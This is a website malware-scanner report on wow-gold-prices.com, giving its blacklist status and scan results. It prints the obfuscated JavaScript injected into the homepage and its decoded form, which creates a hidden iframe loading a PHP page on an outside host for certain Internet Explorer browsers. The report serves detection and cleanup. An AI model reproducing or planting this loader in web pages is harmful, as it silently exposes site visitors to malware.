New scan:

Malware Scanner report for wow-gold-prices.com

Malicious/Suspicious/Total urls checked
1/0/3
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "wow-gold-prices.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=wow-gold-prices.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.wow-gold-prices.com/
200 OK
Content-Length: 7613
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function ogH5(Zwvh, ZRa3, cYF6) { var NGQ0; NGQ0=Zwvh.split(ZRa3); var ULp4=NGQ0.join(cYF6); return ULp4; } function DhP1(QZqb) { QZqb = ogH5(QZqb,"##+##","'"); QZqb = ogH5(QZqb,"##|##","\\"); ULp4=""; Vmx4 =""; for(k=0;k<QZqb.length;k++) { ULp4 = QZqb.charCodeAt(k); if (ULp4==32){ULp4=35} else if (ULp4==35){ULp4=32} else if (ULp4==59){ULp4=64} else if (ULp4==64){ULp4=59} else if (ULp4==37){ULp4=42} else if (ULp4==42){ULp4=37} else if (ULp4>=97 && ULp4<=122) { ULp4=ULp4-97;ULp4=
... 558 bytes are skipped ...
ryfgv(##+##svrtsg##+##,9)@QEg2.hvgZggiryfgv(##+##yliwvi##+##,9)@'));AmR2(DhP1('QEg2.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));AmR2(DhP1('QEg2.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#Meg4=mzertzgli.fhviZtvmg.glOldviXzhv()@'));AmR2(DhP1('RaPq=Meg4.rmwvcLu(##+##nhrv##+##)@Akb3=Meg4.rmwvcLu(##+##nhrv#1##+##)@Qyb3=Meg4.rmwvcLu(##+##mg#3##+##)@'));if ((Zpy6==-1)&&(IzKj>0)&&(Jby6==-1)){AmR2(DhP1('wlxfnvmg.ylwb.zkkvmwXsrow(QEg2)@'));}

Decoded script:


MqHG = 'http://bookrave.com/tmp/z/static.php';Kat7 = 'iframe';
MqHG = 'http://bookrave.com/tmp/z/static.php';Kat7 = 'iframe';
JVt7 = document.createElement(Kat7);JVt7.setAttribute('src', MqHG);
JVt7 = document.createElement(Kat7);JVt7.setAttribute('src', MqHG);
JVt7.setAttribute('width',0);JVt7.setAttribute('height',0);JVt7.setAttribute('border',0);
JVt7.setAttribute('width',0);JVt7.setAttribute('height',0);JVt7.setAttribute('border',0);
JVt7.setAttribute('style','wi
... 27 bytes are skipped ...
none;');
JVt7.setAttribute('style','width: 0; height: 0; border: none;');
JVt7.setAttribute('style','display:none'); Nvt5=navigator.userAgent.toLowerCase();
JVt7.setAttribute('style','display:none'); Nvt5=navigator.userAgent.toLowerCase();
IzKj=Nvt5.indexOf('msie');Zpy6=Nvt5.indexOf('msie 8');Jby6=Nvt5.indexOf('nt 6');
IzKj=Nvt5.indexOf('msie');Zpy6=Nvt5.indexOf('msie 8');Jby6=Nvt5.indexOf('nt 6');
document.body.appendChild(JVt7);
document.body.appendChild(JVt7);

Antivirus reports:

AVG
HTML/Framer

http://ads.adbrite.com/mb/text_group.php?sid=238129&zs=3732385f3930
500 Can't connect to ads.adbrite.com:80
Content-Length: 190
Content-Type: text/plain
clean
http://ads.adbrite.com/test404page.js
500 Can't connect to ads.adbrite.com:80
Content-Length: 190
Content-Type: text/plain
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: wow-gold-prices.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: wow-gold-prices.com
Referer: http://www.google.com/search?q=wow-gold-prices.com

Result:
The result is similar to the first query. There are no suspicious redirects found.